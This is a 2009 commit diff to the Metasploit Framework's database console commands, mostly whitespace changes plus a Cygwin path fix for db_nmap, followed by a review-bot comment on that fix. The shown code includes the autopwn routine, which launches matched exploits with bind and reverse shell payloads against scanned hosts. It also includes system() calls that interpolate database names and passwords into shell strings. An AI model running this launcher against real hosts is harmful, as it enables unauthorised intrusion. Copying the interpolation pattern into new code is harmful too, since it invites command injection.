Expand to a windows path if the exe is outside of the cygwin installation

git-svn-id: file:///home/svn/framework3/trunk@7375 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-11-06 16:01:24 +00:00
parent 48fb445609
commit 4fde76e8f6
1 changed files with 135 additions and 134 deletions


@ -32,7 +32,7 @@ class NmapXMLStreamParser
end
def tag_end(name)
case name
case name
when "host"
host = framework.db.get_host(nil, @addr)
if not host
@ -72,7 +72,7 @@ class Db
require 'tempfile'
include Msf::Ui::Console::CommandDispatcher
#
# Constants
#
@ -83,7 +83,7 @@ class Db
PWN_EXPL = 2**3
PWN_SING = 2**4
PWN_SLNT = 2**5
#
# The dispatcher's name.
#
@ -120,7 +120,7 @@ class Db
"db_import_nmap_xml" => "Import a Nmap scan results file (-oX)",
"db_nmap" => "Executes nmap and records the output automatically",
}
framework.db.active ? base.merge(more) : base
end
@ -132,23 +132,23 @@ class Db
def cmd_db_services(*args)
framework.db.each_service do |service|
print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state} name=#{service.name}")
print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state} name=#{service.name}")
end
end
end
def cmd_db_vulns(*args)
framework.db.each_vuln do |vuln|
reflist = vuln.refs.map { |r| r.name }
print_status("Time: #{vuln.created} Vuln: host=#{vuln.host.address} port=#{vuln.service.port} proto=#{vuln.service.proto} name=#{vuln.name} refs=#{reflist.join(',')}")
end
end
end
def cmd_db_notes(*args)
framework.db.each_note do |note|
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
end
end
end
def cmd_db_add_host(*args)
print_status("Adding #{args.length} hosts...")
args.each do |address|
@ -165,10 +165,10 @@ class Db
host = framework.db.get_host(nil, args[0])
return if not host
service = framework.db.get_service(nil, host, args[2].downcase, args[1].to_i)
return if not service
print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state}")
end
@ -189,20 +189,20 @@ class Db
return
end
naddr = args.shift
naddr = args.shift
ntype = args.shift
ndata = args.join(" ")
host = framework.db.get_host(nil, naddr)
return if not host
note = framework.db.get_note(nil, host, ntype, ndata)
return if not note
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
end
def cmd_db_del_host(*args)
args.each do |address|
if framework.db.del_host(nil, address)
@ -223,15 +223,15 @@ class Db
code = :bind
mjob = 5
regx = nil
port_inc = []
port_exc = []
targ_inc = []
targ_exc = []
args.push("-h") if args.length == 0
while (arg = args.shift)
case arg
when '-t'
@ -284,12 +284,12 @@ class Db
end
matches = {}
[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
# Scan all exploit modules for matching references
mtype[0].each_module do |n,m|
e = m.new
#
# Match based on vulnerability references
#
@ -299,7 +299,7 @@ class Db
ref_name = r.ctx_id + '-' + r.ctx_val
ref = framework.db.has_ref?(ref_name)
if (ref)
ref.vulns.each do |vuln|
vcnt += 1
@ -313,7 +313,7 @@ class Db
next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i))
next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
next if (regx and e.fullname !~ /#{regx}/)
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
end
end
@ -326,23 +326,23 @@ class Db
if (mode & PWN_PORT != 0)
rports = {}
rservs = {}
if(e.datastore['RPORT'])
rports[e.datastore['RPORT'].to_s] = true
end
if(e.respond_to?('autofilter_ports'))
e.autofilter_ports.each do |rport|
rports[rport.to_s] = true
rports[rport.to_s] = true
end
end
if(e.respond_to?('autofilter_services'))
e.autofilter_services.each do |serv|
rservs[serv] = true
rservs[serv] = true
end
end
end
framework.db.services.each do |serv|
next if not serv.host
@ -361,7 +361,7 @@ class Db
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
end
# Match service names
# Match service names
rservs.keys.sort.each do |rserv|
next if serv.name.to_s != rserv
xport = serv.port
@ -374,9 +374,9 @@ class Db
next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
next if (regx and e.fullname !~ /#{regx}/)
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
end
end
end
end
end
end
end
@ -384,13 +384,13 @@ class Db
if (mode & PWN_SHOW != 0)
print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds (#{vcnt} vulns / #{rcnt} refs)")
end
idx = 0
matches.each_key do |xref|
idx += 1
begin
mod = nil
@ -402,7 +402,7 @@ class Db
if (mode & PWN_SHOW != 0)
print_status("Matched #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")
end
#
# The code is just a proof-of-concept and will be expanded in the future
#
@ -419,41 +419,41 @@ class Db
mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp'
end
end
if (code == :conn)
mod.datastore['LHOST'] = Rex::Socket.source_address(xref[2])
mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s
if (mod.datastore['LHOST'] == '127.0.0.1')
print_status("Failed to determine listener address for target #{xref[2]}...")
next
end
if(mod.fullname =~ /\/windows\//)
mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp'
else
mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
end
end
if(framework.jobs.keys.length >= mjob)
print_status("Job limit reached, waiting on modules to finish...")
while(framework.jobs.keys.length >= mjob)
select(nil, nil, nil, 0.25)
end
end
next if not mod.autofilter()
print_status("(#{idx}/#{matches.length}): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")
begin
inp = (mode & PWN_SLNT != 0) ? nil : driver.input
out = (mode & PWN_SLNT != 0) ? nil : driver.output
case mod.type
when MODULE_EXPLOIT
session = mod.exploit_simple(
@ -465,7 +465,7 @@ class Db
session = mod.run_simple(
'LocalInput' => inp,
'LocalOutput' => out,
'RunAsJob' => true)
'RunAsJob' => true)
end
rescue ::Interrupt
raise $!
@ -473,7 +473,7 @@ class Db
print_status(" >> autopwn exception during launch from #{xref[3]}: #{$!} ")
end
end
rescue ::Interrupt
raise $!
rescue ::Exception
@ -490,7 +490,7 @@ class Db
#
def handle_nessus(addr, port, nasl, data)
p = port.match(/^([^\(]+)\((\d+)\/([^\)]+)\)/)
return if not p
return if not p
host = framework.db.get_host(nil, addr)
return if not host
@ -551,12 +551,12 @@ class Db
print_status("Usage: db_import_nessus_nbe [nessus.nbe]")
return
end
if (not File.readable?(args[0]))
if (not File.readable?(args[0]))
print_status("Could not read the NBE file")
return
end
fd = File.open(args[0], 'r')
fd.each_line do |line|
r = line.split('|')
@ -570,10 +570,10 @@ class Db
end
fd.close
end
#
# Import Nessus NESSUS files
#
#
def cmd_db_import_nessus_xml(*args)
if (not (args and args.length == 1))
print_status("Usage: db_import_nessus_xml [nessus.nessus]")
@ -611,12 +611,12 @@ class Db
print_status("Usage: db_import_nmap_xml [nmap.xml]")
return
end
if (not File.readable?(args[0]))
if (not File.readable?(args[0]))
print_status("Could not read the XML file")
return
end
load_nmap_xml(args[0])
end
@ -628,11 +628,11 @@ class Db
print_status("Usage: db_nmap [nmap options]")
return
end
nmap =
Rex::FileUtils.find_full_path("nmap") ||
nmap =
Rex::FileUtils.find_full_path("nmap") ||
Rex::FileUtils.find_full_path("nmap.exe")
if(not nmap)
print_error("The nmap executable could not be found")
return
@ -641,16 +641,16 @@ class Db
fd = Tempfile.new('dbnmap')
# When executing native Nmap, expand the Cygwin path to a Win32 path
if(Rex::Compat.is_cygwin and nmap[0,1] != "/")
if(Rex::Compat.is_cygwin and nmap =~ /^cygdrive/)
args.push('-oX', IO.popen("cygpath -aw #{fd.path}").read.strip)
else
args.push('-oX', fd.path)
end
args.unshift(nmap)
cmd = args.map{|x| '"'+x+'"'}.join(" ")
print_status("exec: #{cmd}")
IO.popen( cmd ) do |io|
io.each_line do |line|
@ -659,7 +659,7 @@ class Db
end
load_nmap_xml(fd.path)
end
end
#
@ -669,7 +669,7 @@ class Db
l = NmapXMLStreamParser.new(framework)
REXML::Document.parse_stream(File.new(filename), l)
end
#
# Import from a THC-Amap machine-readable log file
#
@ -716,7 +716,7 @@ class Db
fd.close
end
#
# Determine if an IP address is inside a given range
#
@ -733,15 +733,15 @@ class Db
end
end
end
false
end
#
# Database management
#
def db_check_driver
if(not framework.db.driver)
print_error("No database driver has been specified")
@ -751,13 +751,13 @@ class Db
end
def cmd_db_driver(*args)
if(args[0])
if(args[0] == "-h")
print_status("Usage: db_driver [driver-name]")
return
end
if(framework.db.drivers.include?(args[0]))
framework.db.driver = args[0]
print_status("Using database driver #{args[0]}")
@ -766,7 +766,7 @@ class Db
end
return
end
if(framework.db.driver)
print_status(" Active Driver: #{framework.db.driver}")
else
@ -774,11 +774,11 @@ class Db
end
print_status(" Available: #{framework.db.drivers.join(", ")}")
end
def cmd_db_driver_tabs(str, words)
return framework.db.drivers
end
def cmd_db_create(*args)
return if not db_check_driver
meth = "db_create_#{framework.db.driver}"
@ -788,7 +788,7 @@ class Db
print_error("This database driver #{framework.db.driver} is not currently supported")
end
end
def cmd_db_destroy(*args)
return if not db_check_driver
meth = "db_destroy_#{framework.db.driver}"
@ -798,7 +798,7 @@ class Db
print_error("This database driver #{framework.db.driver} is not currently supported")
end
end
def cmd_db_connect(*args)
return if not db_check_driver
meth = "db_connect_#{framework.db.driver}"
@ -808,7 +808,7 @@ class Db
print_error("This database driver #{framework.db.driver} is not currently supported")
end
end
def cmd_db_disconnect(*args)
return if not db_check_driver
meth = "db_disconnect_#{framework.db.driver}"
@ -819,12 +819,12 @@ class Db
end
end
#
# Database management: SQLite3
#
#
# Disconnect from the current SQLite3 instance
#
@ -854,26 +854,26 @@ class Db
end
print_status("Successfully connected to the database")
print_status("File: #{opts['dbfile']}")
print_status("File: #{opts['dbfile']}")
end
#
# Create a new SQLite database instance
#
#
def db_create_sqlite3(*args)
cmd_db_disconnect()
info = db_parse_db_uri_sqlite3(args[0])
opts = { 'adapter' => 'sqlite3' }
opts['dbfile'] = info[:path]
sql = ::File.join(Msf::Config.install_root, "data", "sql", "sqlite.sql")
if (::File.exists?(opts['dbfile']))
print_status("The specified database already exists, connecting")
else
print_status("Creating a new database instance...")
require_library_or_gem('sqlite3')
@ -886,11 +886,11 @@ class Db
end
db.close
end
if (not framework.db.connect(opts))
raise RuntimeError.new("Failed to connect to the database")
end
print_status("Successfully connected to the database")
print_status("File: #{opts['dbfile']}")
end
@ -913,11 +913,11 @@ class Db
res[:path] = path || ::File.join(Msf::Config.config_directory, 'sqlite3.db')
res
end
#
# Database management: MySQL
#
#
# Disconnect from the current MySQL instance
#
@ -933,7 +933,7 @@ class Db
def db_connect_mysql(*args)
info = db_parse_db_uri_mysql(args[0])
opts = { 'adapter' => 'mysql' }
opts['username'] = info[:user] if (info[:user])
opts['password'] = info[:pass] if (info[:pass])
opts['database'] = info[:name]
@ -945,7 +945,7 @@ class Db
if (opts['host'].strip.downcase == 'localhost')
opts['host'] = Socket.gethostbyname("localhost")[3].unpack("C*").join(".")
end
if (not framework.db.connect(opts))
raise RuntimeError.new("Failed to connect to the database")
end
@ -953,37 +953,37 @@ class Db
#
# Create a new MySQL database instance
#
#
def db_create_mysql(*args)
cmd_db_disconnect()
info = db_parse_db_uri_mysql(args[0])
opts = { 'adapter' => 'mysql' }
argv = []
if (info[:user])
opts['username'] = info[:user]
opts['username'] = info[:user]
argv.push('-u')
argv.push(info[:user])
end
if (info[:pass])
argv.push('--password=' + info[:pass])
opts['password'] = info[:pass]
opts['password'] = info[:pass]
end
if (info[:host])
opts['host'] = info[:host]
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
opts['port'] = info[:port]
argv.push('-P')
argv.push(info[:port])
# This is an ugly hack for a broken MySQL adapter:
# http://dev.rubyonrails.org/ticket/3338
if (opts['host'].strip.downcase == 'localhost')
@ -992,14 +992,14 @@ class Db
end
argv.push('-f')
opts['database'] = info[:name]
cargs = argv.map{|c| "'#{c}' "}.join
sql = File.join(Msf::Config.install_root, "data", "sql", "mysql.sql")
fd = File.open(sql, 'r')
system("mysqladmin #{cargs} drop #{info[:name]} >/dev/null 2>&1")
system("mysqladmin #{cargs} create #{info[:name]}")
@ -1007,7 +1007,7 @@ class Db
psql.write(fd.read)
psql.close
fd.close
print_status("Database creation complete (check for errors)")
if (not framework.db.connect(opts))
@ -1025,32 +1025,32 @@ class Db
info = db_parse_db_uri_mysql(args[0])
argv = []
if (info[:user])
argv.push('-u')
argv.push(info[:user])
end
if (info[:pass])
argv.push('--password=' + info[:pass])
end
if (info[:host])
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
argv.push('-P')
argv.push(info[:port])
end
argv.push("-f")
cargs = argv.map{|c| "'#{c}' "}.join
system("mysqladmin -f #{cargs} drop #{info[:name]}")
end
def db_parse_db_uri_mysql(path)
res = {}
if (path)
@ -1064,7 +1064,7 @@ class Db
res[:name] = name || 'metasploit3'
res
end
#
# Database management: Postgres
#
@ -1089,7 +1089,7 @@ class Db
opts['database'] = info[:name]
opts['host'] = info[:host] if (info[:host])
opts['port'] = info[:port] if (info[:port])
if (not framework.db.connect(opts))
raise RuntimeError.new("Failed to connect to the database")
end
@ -1097,16 +1097,16 @@ class Db
#
# Create a new Postgres database instance
#
#
def db_create_postgresql(*args)
cmd_db_disconnect()
info = db_parse_db_uri_postgresql(args[0])
opts = { 'adapter' => 'postgresql' }
argv = []
if (info[:user])
opts['username'] = info[:user]
opts['username'] = info[:user]
argv.push('-U')
argv.push(info[:user])
else
@ -1121,26 +1121,26 @@ class Db
print()
argv.push('-W')
end
if (info[:host])
opts['host'] = info[:host]
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
opts['port'] = info[:port]
argv.push('-p')
argv.push(info[:port])
end
opts['database'] = info[:name]
cargs = argv.map{|c| "'#{c}' "}.join
sql = File.join(Msf::Config.install_root, "data", "sql", "postgres.sql")
fd = File.open(sql, 'r')
system("dropdb #{cargs} #{info[:name]} >/dev/null 2>&1")
system("createdb #{cargs} #{info[:name]}")
@ -1148,7 +1148,7 @@ class Db
psql.write(fd.read)
psql.close
fd.close
print_status("Database creation complete (check for errors)")
if (not framework.db.connect(opts))
@ -1165,24 +1165,24 @@ class Db
info = db_parse_db_uri_postgresql(args[0])
argv = []
if (info[:user])
argv.push('-U')
argv.push(info[:user])
end
if (info[:pass])
print()
print_status("Warning: You will need to enter the password at the prompts below")
print()
argv.push('-W')
end
if (info[:host])
argv.push('-h')
argv.push(info[:host])
end
if (info[:port])
argv.push('-p')
argv.push(info[:port])
@ -1191,7 +1191,7 @@ class Db
cargs = argv.map{|c| "'#{c}' "}.join
system("dropdb #{cargs} #{info[:name]}")
end
def db_parse_db_uri_postgresql(path)
res = {}
if (path)
@ -1205,9 +1205,10 @@ class Db
res[:name] = name || 'metasploit3'
res
end
end
end
end
end
end
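Review bot: In the `@ -641,16 +641,16` hunk, the condition that appears to be the new one, `nmap =~ /^cygdrive/`, has no leading slash, so it cannot match an absolute Cygwin path of the form `/cygdrive/c/...`. If `Rex::FileUtils.find_full_path` returns absolute paths (its body is not visible here), the `cygpath -aw` branch is never taken and a native nmap.exe is handed a Cygwin-style `-oX` path. I would write the test as `if(Rex::Compat.is_cygwin and nmap =~ %r{\A/cygdrive/})`, which also replaces `^` (start of any line in Ruby) with `\A`. The comment above it could state the reason: `# nmap found under /cygdrive is a native Win32 build, so -oX needs a Win32 path`. The enclosing db_nmap command method starts and ends outside this hunk.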